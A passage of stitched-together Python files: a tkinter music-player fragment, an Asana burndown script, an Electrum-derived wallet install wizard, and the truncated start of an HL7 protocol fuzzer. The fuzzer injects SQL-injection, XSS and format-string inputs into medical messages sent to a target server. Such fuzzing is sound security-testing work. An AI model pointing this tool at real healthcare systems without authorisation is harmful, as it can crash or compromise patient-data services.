stopButton.place(relx=0.466, rely=0.213, height=28, width=49)
stopButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''停止''',)
renewButton = tkinter.Button(music_root, command=lambda: renew(song))
renewButton.place(relx=0.683, rely=0.213, height=28, width=49)
renewButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''重放''',)
upButton = tkinter.Button(music_root, command=lambda: volume_up(song, volume))
upButton.place(relx=0.885, rely=0.213, height=15, width=25)
upButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
width=39,
text='''+''',)
downButton = tkinter.Button(music_root, command=lambda: volume_down(song, volume))
downButton.place(relx=0.885, rely=0.5, height=15, width=25)
downButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
width=20,
text='''-''',)
music_root.mainloop()
def resume(song):
song.resume()
def pause(song):
song.pause()
def stop(song, music_root):
song.stop()
music_root.destroy()
def renew(song):
song.stop()
song.play()
def volume_up(song, vol):
global volume
if volume < 100:
vol += 5
volume = vol
song.volume(volume)
def volume_down(song, vol):
global volume
if vol > 0:
vol -= 5
volume = vol
song.volume(volume)
|
asana_burndown.py | #!/usr/bin/env python
"""Convert Asana data into a day-by-day CSV file to generate a burndown chart.
Usage: asana_burndown.py <API_KEY>
Reads Asana's exported JSON from stdin. Writes CSV data to stdout that can be
imported into a spreadsheet (e.g. Google Sheets) to generate a burndown chart.
Inspired by https://github.com/ckalima/asana-tools
Asana API docs:
https://asana.com/developers/documentation/getting-started
https://asana.com/developers/api-reference
"""
import base64
import collections
import csv
import datetime
import itertools
import json
import sys
import threading
import urllib2
PRIORITIES = ('P0', 'P1', 'P2', 'Z')
DEFAULT_SIZE = 2.0
START = datetime.date(2015, 5, 12)
def parse(date_str):
return datetime.datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%S.%fZ')
def main():
tasks = {t['id']: t for t in json.load(sys.stdin)['data']}
#
# step 1: fetch history of each task from Asana API
#
headers = {'Authorization': 'Basic %s' %
base64.encodestring('%s:' % sys.argv[1]).replace('\n', '')}
# maps task id (int) to list of story dicts
history = {}
history_lock = threading.Lock()
# example story:
# {
# "created_at" : "2015-05-08T19:35:22.842Z",
# "type" : "system",
# "created_by" : {
# "name" : "Nish Bhat",
# "id" : 6503456116052
# },
# "text" : "added to Bioinformatics",
# "id" : 33571348387449
# }
#
# other possible text: "removed from P2", "completed this task", etc
#
sys.stderr.write('Fetching task history')
def get_history(id):
req = urllib2.Request('https://app.asana.com/api/1.0/tasks/%s/stories' % id,
headers=headers)
try:
hist = json.loads(urllib2.urlopen(req).read())['data']
except urllib2.HTTPError, e:
print >> sys.stderr, 'Broke on task %r: %s %s' % (
id, e.code, e.read() or getattr(e, 'body'))
raise
with history_lock:
history[id] = hist
sys.stderr.write('.')
threads = []
for id in tasks:
thread = threading.Thread(target=get_history, args=(id,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
sys.stderr.write('\n')
# uncomment to read/write task history to/from disk
#
# with open('/Users/ryan/hist.json', 'w') as f:
# f.write(json.dumps(history, indent=2))
# with open('/Users/ryan/hist.json') as f:
# history = {int(k): v for k, v in json.loads(f.read()).items()}
#
# step 2: generate calendars of when each task was created and completed
#
# these map datetime.date to list of task dicts
by_created = collections.defaultdict(list)
by_completed = collections.defaultdict(list)
for task in tasks.values():
# record creation and completion date
created = task['last_change'] = parse(task['created_at']).date()
by_created[created].append(task)
if task['completed']:
by_completed[parse(task['completed_at']).date()].append(task)
# record priority and size
task['orig_priority'] = 'Z' # so it sorts after P*
task['orig_size'] = DEFAULT_SIZE
for tag in task.get('tags', []):
name = tag['name']
if name in PRIORITIES:
task['orig_priority'] = name
elif name.endswith('pts'):
task['orig_size'] = float(name[:-3].strip())
task['cur_priority'] = task['orig_priority']
task['cur_size'] = task['orig_size']
#
# step 3: generate calendar of when tasks changed priority or size
#
# these map datetime.date to dict of task id to string priority or float size
changed_priority = collections.defaultdict(dict)
changed_size = collections.defaultdict(dict)
for id, stories in history.items():
for story in sorted(stories, key=lambda s: parse(s['created_at'])):
if story['type'] != 'system':
continue
prefix = 'added to '
if story['text'].startswith(prefix):
tag = story['text'][len(prefix):]
date = parse(story['created_at']).date()
if tag in PRIORITIES:
changed_priority[date][id] = tag
elif tag.endswith('pts'):
changed_size[date][id] = float(tag[:-3].strip())
#
# step 4: walk dates, keep track of point sums per priority, and write CSV rows
#
# these map priority (including None) to point sum
original = collections.defaultdict(float)
extra = collections.defaultdict(float)
complete = 0
# CSV header
writer = csv.writer(sys.stdout, delimiter='\t')
priorities = tuple(itertools.chain(*((p, p + ' new') for p in PRIORITIES)))
writer.writerow(('Date', 'Complete') + priorities)
day = datetime.timedelta(days=1)
cur = min(min(by_completed), START - day)
end = max(by_completed)
def from_ledger(task):
return original if task['last_change'] <= START else extra
while cur <= end:
cur += day
to_ledger = original if cur <= START else extra
for task in by_created[cur]:
to_ledger[task['cur_priority']] += task['cur_size']
for task in by_completed[cur - day]: # count tasks completed on the day *after*
from_ledger(task)[task['cur_priority']] -= task['cur_size']
if cur >= START:
complete += task['cur_size']
for id, new_priority in changed_priority[cur].items():
task = tasks[id]
to_ledger[new_priority] += task['cur_size']
from_ledger(task)[task['cur_priority']] -= task['cur_size']
task['cur_priority'] = new_priority
task['last_change'] = cur
for id, new_size in changed_size[cur].items():
task = tasks[id]
to_ledger[task['cur_priority']] += new_size
from_ledger(task)[task['cur_priority']] -= task['cur_size']
task['cur_size'] = new_size
task['last_change'] = cur
if cur >= START - day and cur.weekday() < 5: # not weekend
priorities = tuple(itertools.chain(*((original[p], extra[p])
for p in PRIORITIES)))
writer.writerow((cur, complete) + priorities)
if __name__ == '__main__':
main()
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum for VIPSTARCOIN - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
hl7fuzz.py | #Hl7 message fuzzer
#twitter: 0xRaindrop
import argparse
import socket
import queue
from os import listdir, urandom
from random import randrange, choice
from sqlalchemy import create_engine, Table, Column, String, MetaData
from time import time_ns,sleep
import numpy
import re
import threading
import _thread
class hl7fuzz():
def __init__(self, cmdargs):
self.bq = queue.Queue()
self.fq = queue.Queue()
self.cmdargs = cmdargs
self.KillT = 0
self.header = b'\x0b'
self.tail = b'\x1c\x0d'
self.badstrings = []
with open('payloads/badstrings.txt','rb') as bads:
for i,j in enumerate(bads.readlines()):
if j[0] != 35:
self.badstrings.append(j.replace(b'\r\n',b''))
self.badstrings = list(set(self.badstrings))
self.badstrings.pop(0)
self.sock = socket.socket()
if self.cmdargs.server and self.cmdargs.serverport:
self.hl7server()
elif self.cmdargs.ip and self.cmdargs.port and self.cmdargs.server == 0:
self.grab()
else:
print("[INFO] No HL7 remote server IP and port were set.. Exiting...!")
def dbSRhl7(self):
self.dbname = f"hl7sessionfuzz-{time_ns()}.db" if not self.cmdargs.server else f"hl7sessionfuzz-server-{time_ns()}.db"
self.engine = create_engine(f'sqlite:///DB/{self.dbname}', echo=False)
self.metadata = MetaData()
fuzzsession = Table(
'fuzzhl7', self.metadata,
Column('sent', String),
Column('recv', String), )
self.metadata.create_all(self.engine)
return self.engine, fuzzsession
def grab(self):
print("[-] Queuing baseline messages.")
for message in listdir(self.cmdargs.folder):
with open(f"{self.cmdargs.folder}/{message}", 'rb') as msg:
self.bq.put(b''.join(msg.readlines()))
print("\t-Done!")
self.fuzz()
def fuzz(self):
print("[-] Connecting to server...")
self.sender = threading.Thread(target=self.transmit)
self.sender.start()
print("[-] Creating & sending samples...")
if self.cmdargs.target is not None:
while not self.bq.empty():
msg = self.bq.get()
self.fmtstr = [b"%n" * randrange(1, self.cmdargs.max), b"%c" * randrange(1, self.cmdargs.max),
b"%s" * randrange(1, self.cmdargs.max), b"%p" * randrange(1, self.cmdargs.max),
b"%d" * randrange(1, self.cmdargs.max)]
self.sqli = [i for i in open('payloads/sqli.txt', 'rb').readlines()]
self.xss = [i for i in open('payloads/xss.txt', 'rb').readlines()]
self.elements = [b'^' * randrange(1, self.cmdargs.max), b'\\' * randrange(1, self.cmdargs.max),
b'&' * randrange(1, self.cmdargs.max), b'~' * randrange(1, self.cmdargs.max)]
self.strats = [b"A" * randrange(1, self.cmdargs.max), urandom(randrange(1, self.cmdargs.max)),
choice(self.elements), choice(self.sqli), choice(self.xss),
choice(self.fmtstr), choice(self.badstrings)]
for i in range(self.cmdargs.samples):
try:
msg1 = re.sub(self.cmdargs.target.encode() ,choice(self.strats),msg)
except:
msg1 = re.sub(self.cmdargs.target.encode(), b"\xcc"*10, msg)
self.fq.put(self.header + msg1 + self.tail)
else:
try:
line, fld = self.cmdargs.change.split(',')
except:
line, fld = (-1,-1)
while not self.bq.empty():
x = self.bq.get()
for q in range(self.cmdargs.samples):
msg = []
arr = numpy.array(x.split(b'\n'))
for i, j in enumerate(arr):
arr2 = j.split(b"|")
for k, l in enumerate(arr2):
try:
if self.cmdargs.allparts == 0 and i == 0:
pass
else:
arr2[randrange(1, len(arr2))] = choice(self.strats)
if int(line) > -1:
arr2[int(fld)] = randrange(11234532, 9999999999).to_bytes(10,'big')
break
except:
pass
msg.append(b'|'.join(arr2))
if self.cmdargs.clientmode == 0:
self.fq.put(self.header + b''.join(msg) + self.tail)
else:
self.fq.put(b''.join(msg))
while True:
try:
sleep(10)
if self.sender.is_alive() == False:
print("[-]Fuzz session completed.\n\t-Sockets closed...\n\t-Exiting!")
self.sender.join()
exit()
except KeyboardInterrupt:
self.KillT = 1
print("[-]Fuzz session completed.\n\t-Sockets closed...\n\t-Exiting!")
self.sender.join()
exit()
def transmit(self):
self.sock.connect((self.cmdargs.ip, self.cmdargs.port))
print(f"[-]Connected to: {self.cmdargs.ip}:{self.cmdargs.port}")
dbobj, _table = self.dbSRhl7()
dbconnect = dbobj.connect()
while True:
if self.KillT == 1:
break
if self.fq.empty():
break
send_hl7 = self.fq.get()
try:
self.sock.send(send_hl7)
recv_reply = self.sock.recv(5000)
except Exception as e:
self.sock.close()
self.transmit()
print(e)
continue
if self.cmdargs.noisey:
